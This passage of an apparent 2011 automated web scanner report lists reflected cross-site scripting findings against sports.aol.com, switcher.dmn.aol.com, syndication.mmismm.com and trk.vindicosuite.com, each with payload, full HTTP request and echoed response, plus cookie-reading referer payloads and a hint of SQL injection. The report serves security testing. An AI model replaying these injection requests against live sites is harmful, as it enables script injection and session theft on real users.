Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; dcisid=2334838204.3457568077.2591753984; bandType=broadband; s_pers=%20s_getnr%3D1297023600701-Repeat%7C1360095600701%3B%20s_nrgvo%3DRepeat%7C1360095600703%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B

Response

HTTP/1.0 404 Not Found
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:19:29 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
ntCoent-Length: 24922
Connection: close
Content-Length: 24922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm02 -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:
...[SNIP]...
<";
s_265.pfxID="spr";
s_265.disablepihost=false;
s_265.prop12="http://sports.aol.com/favicon.ico87de0</script><script>alert(1)</script>d5d06ef2b0a";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

1.216. http://sports.aol.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.aol.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload ee570--><img%20src%3da%20onerror%3dalert(1)>8e55749f635 was submitted in the REST URL parameter 1. This input was echoed as ee570--><img src=a onerror=alert(1)>8e55749f635 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /ee570--><img%20src%3da%20onerror%3dalert(1)>8e55749f635 HTTP/1.1
Host: sports.aol.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; dcisid=2334838204.3457568077.2591753984; bandType=broadband; s_pers=%20s_getnr%3D1297023600701-Repeat%7C1360095600701%3B%20s_nrgvo%3DRepeat%7C1360095600703%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B

Response

HTTP/1.0 404 Not Found
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:19:33 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
ntCoent-Length: 24922
Connection: close
Content-Length: 24922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld29 -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:
...[SNIP]...
<!--req:101x1_1.us.sports20.ee570--><img src=a onerror=alert(1)>8e55749f635.broadband ad:none (recursion blocked at default(mn=0)) -->
...[SNIP]...

1.217. http://sports.aol.com/scores [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.aol.com
Path:   /scores

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d396"-alert(1)-"2e6570a7b85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scores6d396"-alert(1)-"2e6570a7b85 HTTP/1.1
Host: sports.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=2393099708.3390197069.4049274368; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:11:06 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 24843
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld03 -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:
...[SNIP]...
<!--
s_265.mmxgo=true;
s_265.pageName="Page Not Found";
s_265.channel="us.sports";
s_265.trackExternalLinks="true";
s_265.prop1="scores6d396"-alert(1)-"2e6570a7b85";
s_265.pfxID="spr";
s_265.disablepihost=false;
s_265.prop12="http://sports.aol.com/scores6d396\"-alert(1)-\"2e6570a7b85";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_c
...[SNIP]...

1.218. http://sports.aol.com/scores [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.aol.com
Path:   /scores

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 35d9f--><img%20src%3da%20onerror%3dalert(1)>cac995bf9ec was submitted in the REST URL parameter 1. This input was echoed as 35d9f--><img src=a onerror=alert(1)>cac995bf9ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /scores35d9f--><img%20src%3da%20onerror%3dalert(1)>cac995bf9ec HTTP/1.1
Host: sports.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=2393165244.320032077.861537792; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:11:08 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 24952
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld04 -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:
...[SNIP]...
<!--req:101x1_1.us.sports20.scores35d9f--><img src=a onerror=alert(1)>cac995bf9ec.broadband ad:none (recursion blocked at default(mn=0)) -->
...[SNIP]...

1.219. http://switcher.dmn.aol.com/sw/a [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://switcher.dmn.aol.com
Path:   /sw/a

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a695d<script>alert(1)</script>02c8710ec0a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sw/a?callback=parseSLa695d<script>alert(1)</script>02c8710ec0a&sch=afc-weblogs-xml&ssch=autoblog_2009&surl=http%3A//www.autoblog.com/%3Fb6c46%2522-alert%28document.cookie%29-%25228a56f02ab0f%3D1&snum=6&of=js&rv=1.3&shints=automobile HTTP/1.1
Host: switcher.dmn.aol.com
Proxy-Connection: keep-alive
Referer: http://www.autoblog.com/?b6c46%22-alert(document.cookie)-%228a56f02ab0f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; bandType=broadband; s_pers=%20s_getnr%3D1297023688615-Repeat%7C1360095688615%3B%20s_nrgvo%3DRepeat%7C1360095688616%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:28:41 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
ntCoent-Length: 3342
Content-Length: 3342


       sponsorData = [

       {
       
               title:'Audi (Official Site)'
           

                                                                   , url:'www.AudiUSA.com'
           
           
                           , d1:'Say Goodnight To Old Luxury And'
           
...[SNIP]...
<!-- CitySearch PFP -->        
       

                                                                               }
   
];


parseSLa695d<script>alert(1)</script>02c8710ec0a(sponsorData);


1.220. http://syndication.mmismm.com/mmtnt.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /mmtnt.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69f89'%3balert(1)//89b3aef460a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69f89';alert(1)//89b3aef460a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mmtnt.php?69f89'%3balert(1)//89b3aef460a=1 HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://www.masstransitmag.com/online/article.jsp?siteSection=3&id=1358448181--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec11697f1d6d&pageNum=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G=10120000000990801741

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 21:52:52 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV"
Set-Cookie: G=10120000000990801741; expires=Sun, 07-Feb-2016 03:52:52 GMT; path=/; domain=.mmismm.com
Content-Length: 493
Content-Type: text/javascript

document.write('<script type="text/javascript">var D=new Date();var Z=D.getTimezoneOffset();var R="";if(typeof document.referrer!=="undefined"){R="&ref="+encodeURIComponent(document.referrer);}</'+'sc
...[SNIP]...
<script type="text/javascript" src="http://syndication.mmismm.com/two.php?69f89';alert(1)//89b3aef460a=1&origin='+encodeURIComponent(document.URL)+'&tzos='+Z+R+'&cb='+Math.floor(Math.random()*0xffffffff)+'&mm_pub='+mm_client+'&mm_channel='+mm_channel+'">
...[SNIP]...

1.221. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the adRotationId request parameter is copied into the HTML document as plain text between tags. The payload d748a<script>alert(1)</script>483d9c82222 was submitted in the adRotationId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1804&syndicationOutletId=44418&campaignId=6035&adRotationId=14567d748a<script>alert(1)</script>483d9c82222&bannerCreativeAdModuleId=20031&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6035%2fBANNERCREATIVE%2fglad_300x250_23.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc_vpp={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sun, 06 Feb 2011 20:38:11 GMT
Expires: Sun, 06 Feb 2011 20:38:12 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSDSSCBB=KOKDELMCNDFPCJFLBIEHNFFB; path=/
X-Powered-By: ASP.NET
Content-Length: 1000
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'd748a'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1804, @bannerCreativeAdModuleId = 20031, @campaignId = 6035, @syndicationOutletId = 44418, @adrotationId = 14567d748a<script>alert(1)</script>483d9c82222, @ipAddress = '173.193.214.243', @sessionId = '750039506', @pixel = '0', @ipNumber = '2915161843', @referer = 'http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4
...[SNIP]...

1.222. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the bannerCreativeAdModuleId request parameter is copied into the HTML document as plain text between tags. The payload 9f9f9<script>alert(1)</script>58e0364ee35 was submitted in the bannerCreativeAdModuleId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1804&syndicationOutletId=44418&campaignId=6035&adRotationId=14567&bannerCreativeAdModuleId=200319f9f9<script>alert(1)</script>58e0364ee35&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6035%2fBANNERCREATIVE%2fglad_300x250_23.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc_vpp={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sun, 06 Feb 2011 20:38:14 GMT
Expires: Sun, 06 Feb 2011 20:38:15 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCCQTRADB=BJFKINMCIAFIFOKPEBOLGODF; path=/
X-Powered-By: ASP.NET
Content-Length: 999
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'f9f9'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1804, @bannerCreativeAdModuleId = 200319f9f9<script>alert(1)</script>58e0364ee35, @campaignId = 6035, @syndicationOutletId = 44418, @adrotationId = 14567, @ipAddress = '173.193.214.243', @sessionId = '752425316', @pixel = '0', @ipNumber = '2915161843', @referer = 'http://www.cbs.c
...[SNIP]...

1.223. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the campaignId request parameter is copied into the HTML document as plain text between tags. The payload 3872b<script>alert(1)</script>508553eaf6f was submitted in the campaignId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1804&syndicationOutletId=44418&campaignId=60353872b<script>alert(1)</script>508553eaf6f&adRotationId=14567&bannerCreativeAdModuleId=20031&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6035%2fBANNERCREATIVE%2fglad_300x250_23.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc_vpp={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sun, 06 Feb 2011 20:38:08 GMT
Expires: Sun, 06 Feb 2011 20:38:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQTQSBDB=ABKFHBNCCDOGEAKPCMKCCBHA; path=/
X-Powered-By: ASP.NET
Content-Length: 996
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'b'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1804, @bannerCreativeAdModuleId = 20031, @campaignId = 60353872b<script>alert(1)</script>508553eaf6f, @syndicationOutletId = 44418, @adrotationId = 14567, @ipAddress = '173.193.214.243', @sessionId = '756534601', @pixel = '0', @ipNumber = '2915161843', @referer = 'http://www.cbs.com/primetime/big_ban
...[SNIP]...

1.224. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the siteId request parameter is copied into the HTML document as plain text between tags. The payload 6e2c7<script>alert(1)</script>ecfd5510463 was submitted in the siteId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=18046e2c7<script>alert(1)</script>ecfd5510463&syndicationOutletId=44418&campaignId=6035&adRotationId=14567&bannerCreativeAdModuleId=20031&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6035%2fBANNERCREATIVE%2fglad_300x250_23.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc_vpp={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sun, 06 Feb 2011 20:38:07 GMT
Expires: Sun, 06 Feb 2011 20:38:07 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQAQRAADB=AMBBLJHDLNPJPAHAJKBIOLFH; path=/
X-Powered-By: ASP.NET
Content-Length: 997
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'c7'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 18046e2c7<script>alert(1)</script>ecfd5510463, @bannerCreativeAdModuleId = 20031, @campaignId = 6035, @syndicationOutletId = 44418, @adrotationId = 14567, @ipAddress = '173.193.214.243', @sessionId = '932910221', @pixel = '0', @ipNumber = '291516
...[SNIP]...

1.225. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the syndicationOutletId request parameter is copied into the HTML document as plain text between tags. The payload 2f6c5<script>alert(1)</script>9b9dc606334 was submitted in the syndicationOutletId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The same verbose SQL error seen with the siteId parameter applies here: the syndicationOutletId value appears unquoted inside the echoed Track_BannerCreativeImpression_V.1 call and the database reports a syntax error at the injected text, so this parameter should be tested for SQL injection as well as XSS.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1804&syndicationOutletId=444182f6c5<script>alert(1)</script>9b9dc606334&campaignId=6035&adRotationId=14567&bannerCreativeAdModuleId=20031&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6035%2fBANNERCREATIVE%2fglad_300x250_23.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
